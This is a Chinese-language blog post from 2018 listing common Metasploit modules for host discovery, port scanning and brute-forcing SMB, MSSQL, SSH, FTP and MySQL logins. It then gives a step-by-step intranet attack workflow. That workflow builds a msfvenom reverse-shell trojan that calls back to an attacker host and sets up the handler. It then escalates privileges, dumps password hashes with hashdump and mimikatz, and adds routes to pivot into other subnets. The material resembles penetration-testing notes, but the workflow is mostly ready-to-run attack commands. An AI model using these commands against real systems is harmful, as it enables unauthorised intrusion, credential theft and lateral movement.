Marksec's Blog.

Metasploit常用模块总结

字数统计: 778阅读时长: 3 min
2018/07/06 Share

msf常用模块整理

主机信息收集

使用auxiliary/scanner/discovery/下模块进行扫描

模块有:

1
2
3
4
5
6
7
use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/discovery/empty_udp
use auxiliary/scanner/discovery/ipv6_multicast_ping
use auxiliary/scanner/discovery/ipv6_neighbor
use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep

主机端口扫描

使用auxiliary/scanner/portscan/下的模块探测主机端口

模块有:

1
2
3
4
5
auxiliary/scanner/portscan/ack       //ACK防火墙扫描
auxiliary/scanner/portscan/ftpbounce // FTP跳端口扫描
auxiliary/scanner/portscan/syn //SYN端口扫描
auxiliary/scanner/portscan/tcp //TCP端口扫描
auxiliary/scanner/portscan/xmas //TCP”XMas”端口扫描

SMB登录扫描

使用auxiliary/scanner/smb/下的模块进行SMB相关操作

模块有:

1
2
3
4
5
6
7
8
9
10
11
12
auxiliary/scanner/smb/pipe_auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor //返回DCERPC信息
auxiliary/scanner/smb/psexec_loggedin_users
auxiliary/scanner/smb/smb2 //扫描SMB2协议
auxiliary/scanner/smb/smb_enum_gpp
auxiliary/scanner/smb/smb_enumshares //扫描smb共享文件
auxiliary/scanner/smb/smb_enumusers //smb枚举系统用户
auxiliary/scanner/smb/smb_enumusers_domain
auxiliary/scanner/smb/smb_login //SMB登录
auxiliary/scanner/smb/smb_lookupsid //扫描组的用户
auxiliary/scanner/smb/smb_uninit_cred
auxiliary/scanner/smb/smb_version //扫描系统版本

SQLSERVER登录扫描

使用auxiliary/scanner/mssql/下的模块探测SQL server的信息

模块有:

1
2
3
4
auxiliary/scanner/mssql/mssql_hashdump  //dump密码hash
auxiliary/scanner/mssql/mssql_login //密码爆破
auxiliary/scanner/mssql/mssql_ping //嗅探
auxiliary/scanner/mssql/mssql_schemadump

SSH探测扫描

使用auxiliary/scanner/ssh/下的模块探测ssh信息

模块有:

1
2
3
4
5
6
7
auxiliary/scanner/ssh/cerberus_sftp_enumusers
auxiliary/scanner/ssh/detect_kippo
auxiliary/scanner/ssh/ssh_enumusers //枚举用户
auxiliary/scanner/ssh/ssh_identify_pubkeys
auxiliary/scanner/ssh/ssh_login //密码爆破
auxiliary/scanner/ssh/ssh_login_pubkey
auxiliary/scanner/ssh/ssh_version //查看版本

FTP探测扫描

使用auxiliary/scanner/ftp/下的模块探测ftp信息

模块有:

1
2
3
4
5
6
7
auxiliary/scanner/ftp/anonymous         
auxiliary/scanner/ftp/bison_ftp_traversal
auxiliary/scanner/ftp/ftp_login //密码爆破
auxiliary/scanner/ftp/ftp_version //查看版本
auxiliary/scanner/ftp/konica_ftp_traversal
auxiliary/scanner/ftp/pcman_ftp_traversal
auxiliary/scanner/ftp/titanftp_xcrc_traversal

MYSQL探测扫描

使用auxiliary/scanner/mysql/下的模块探测mysql信息

模块有:

1
2
3
4
5
6
auxiliary/scanner/mysql/mysql_authbypass_hashdump
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_hashdump //dump密码hash
auxiliary/scanner/mysql/mysql_login //密码爆破
auxiliary/scanner/mysql/mysql_schemadump
auxiliary/scanner/mysql/mysql_version //查看版本

内网操作基本步骤流程

制作msf回连木马

当获得webshell的时候,我们制作一个msf木马来进行回连

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 =F exe >/root/Desktop/443.exe

回连准备

打开msfconsole,准备进行回连

1
2
3
4
5
6
use exploit/multi/handler                     //使用后门模块
set payload windows/meterpreter/reverse_tcp //设置payload
show options
set LHOST 192.168.1.1 //设置回连地址
set lport 443 //设置回连端口
run

查看基本情况

1
2
getuid     //查看当前用户
getsystem //提权

提权

backgroundctrl+z
将回连的meterpreter放入session中 sessions ­i 号 叫回session 在msf下use exploit/windows/local/ TAB 可以列出所有的可提权的模块

1
msf exploit(handler) > use exploit/windows/local/             //调用windows的本地模块

密码获取与解密

1
2
3
hashdump      //密码获取
load mimikatz //使用mimikatz
kerberos //查看解密

新路由查看子网

1
2
3
4
5
6
route         //查看路由
background
sessions
route add 192.168.2.0 255.255.255.0 2 //路由添加
search mssql //找mssql模块
use auxiliary/scanner/mssql/mssql_login //使用login模块

查看机器是否是虚拟机

1
meterpreter > run post/windows/gather/checkvm

总结

上面的这些模块是我们使用mfs中最经常使用的模块,对这些基础模块进行一个整理,以后使用会更加方便一点,当时是一个特别棒的工具,以后再慢慢写其他的模块。

CATALOG
  1. 1. msf常用模块整理
  2. 2. 内网操作基本步骤流程
  3. 3. 总结